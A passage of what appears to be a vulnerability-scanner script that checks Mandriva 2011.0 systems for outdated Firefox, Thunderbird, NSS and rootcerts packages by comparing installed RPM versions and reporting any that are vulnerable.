rpm:\"firefox-gd~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hr\", rpm:\"firefox-hr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hy\", rpm:\"firefox-hy~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kk\", rpm:\"firefox-kk~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ku\", rpm:\"firefox-ku~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lg\", rpm:\"firefox-lg~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mai\", rpm:\"firefox-mai~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ml\", rpm:\"firefox-ml~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nso\", rpm:\"firefox-nso~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-or\", rpm:\"firefox-or~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sr\", rpm:\"firefox-sr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ta\", rpm:\"firefox-ta~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ta_LK\", rpm:\"firefox-ta_LK~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-vi\", rpm:\"firefox-vi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zu\", rpm:\"firefox-zu~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss3\", rpm:\"libnss3~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-devel\", rpm:\"libnss-devel~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnss-static-devel\", rpm:\"libnss-static-devel~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird\", rpm:\"mozilla-thunderbird~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ar\", rpm:\"mozilla-thunderbird-ar~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-be\", rpm:\"mozilla-thunderbird-be~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-bg\", rpm:\"mozilla-thunderbird-bg~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-bn_BD\", rpm:\"mozilla-thunderbird-bn_BD~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-br\", rpm:\"mozilla-thunderbird-br~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ca\", rpm:\"mozilla-thunderbird-ca~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-cs\", rpm:\"mozilla-thunderbird-cs~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-da\", rpm:\"mozilla-thunderbird-da~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-de\", rpm:\"mozilla-thunderbird-de~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-el\", rpm:\"mozilla-thunderbird-el~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-en_GB\", rpm:\"mozilla-thunderbird-en_GB~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail\", rpm:\"mozilla-thunderbird-enigmail~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ar\", rpm:\"mozilla-thunderbird-enigmail-ar~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ca\", rpm:\"mozilla-thunderbird-enigmail-ca~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-cs\", rpm:\"mozilla-thunderbird-enigmail-cs~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-de\", rpm:\"mozilla-thunderbird-enigmail-de~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-el\", rpm:\"mozilla-thunderbird-enigmail-el~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-es\", rpm:\"mozilla-thunderbird-enigmail-es~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-fi\", rpm:\"mozilla-thunderbird-enigmail-fi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-fr\", rpm:\"mozilla-thunderbird-enigmail-fr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-it\", rpm:\"mozilla-thunderbird-enigmail-it~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ja\", rpm:\"mozilla-thunderbird-enigmail-ja~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ko\", rpm:\"mozilla-thunderbird-enigmail-ko~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-nb\", rpm:\"mozilla-thunderbird-enigmail-nb~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-nl\", rpm:\"mozilla-thunderbird-enigmail-nl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-pl\", rpm:\"mozilla-thunderbird-enigmail-pl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-pt\", rpm:\"mozilla-thunderbird-enigmail-pt~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-pt_BR\", rpm:\"mozilla-thunderbird-enigmail-pt_BR~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-ru\", rpm:\"mozilla-thunderbird-enigmail-ru~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-sl\", rpm:\"mozilla-thunderbird-enigmail-sl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-sv\", rpm:\"mozilla-thunderbird-enigmail-sv~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-tr\", rpm:\"mozilla-thunderbird-enigmail-tr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-vi\", rpm:\"mozilla-thunderbird-enigmail-vi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-zh_CN\", rpm:\"mozilla-thunderbird-enigmail-zh_CN~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-enigmail-zh_TW\", rpm:\"mozilla-thunderbird-enigmail-zh_TW~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-es_AR\", rpm:\"mozilla-thunderbird-es_AR~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-es_ES\", rpm:\"mozilla-thunderbird-es_ES~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-et\", rpm:\"mozilla-thunderbird-et~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-eu\", rpm:\"mozilla-thunderbird-eu~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-fi\", rpm:\"mozilla-thunderbird-fi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-fr\", rpm:\"mozilla-thunderbird-fr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-fy\", rpm:\"mozilla-thunderbird-fy~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ga\", rpm:\"mozilla-thunderbird-ga~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-gd\", rpm:\"mozilla-thunderbird-gd~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-gl\", rpm:\"mozilla-thunderbird-gl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-he\", rpm:\"mozilla-thunderbird-he~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-hu\", rpm:\"mozilla-thunderbird-hu~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-id\", rpm:\"mozilla-thunderbird-id~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-is\", rpm:\"mozilla-thunderbird-is~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-it\", rpm:\"mozilla-thunderbird-it~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ja\", rpm:\"mozilla-thunderbird-ja~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ko\", rpm:\"mozilla-thunderbird-ko~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-lightning\", rpm:\"mozilla-thunderbird-lightning~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-lt\", rpm:\"mozilla-thunderbird-lt~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-nb_NO\", rpm:\"mozilla-thunderbird-nb_NO~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-nl\", rpm:\"mozilla-thunderbird-nl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-nn_NO\", rpm:\"mozilla-thunderbird-nn_NO~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-pl\", rpm:\"mozilla-thunderbird-pl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-pt_BR\", rpm:\"mozilla-thunderbird-pt_BR~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-pt_PT\", rpm:\"mozilla-thunderbird-pt_PT~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ro\", rpm:\"mozilla-thunderbird-ro~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ru\", rpm:\"mozilla-thunderbird-ru~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-si\", rpm:\"mozilla-thunderbird-si~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sk\", rpm:\"mozilla-thunderbird-sk~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sl\", rpm:\"mozilla-thunderbird-sl~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sq\", rpm:\"mozilla-thunderbird-sq~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-sv_SE\", rpm:\"mozilla-thunderbird-sv_SE~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-ta_LK\", rpm:\"mozilla-thunderbird-ta_LK~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-tr\", rpm:\"mozilla-thunderbird-tr~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-uk\", rpm:\"mozilla-thunderbird-uk~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-vi\", rpm:\"mozilla-thunderbird-vi~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-zh_CN\", rpm:\"mozilla-thunderbird-zh_CN~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-zh_TW\", rpm:\"mozilla-thunderbird-zh_TW~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nsinstall\", rpm:\"nsinstall~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts\", rpm:\"rootcerts~20120218.00~1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts-java\", rpm:\"rootcerts-java~20120218.00~1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-thunderbird-l10n\", rpm:\"mozilla-thunderbird-l10n~10.0.2~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rootcerts\", rpm:\"rootcerts~20120218.00~1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss3\", rpm:\"lib64nss3~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-devel\", rpm:\"lib64nss-devel~3.13.1~0.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64nss-static-devel\", 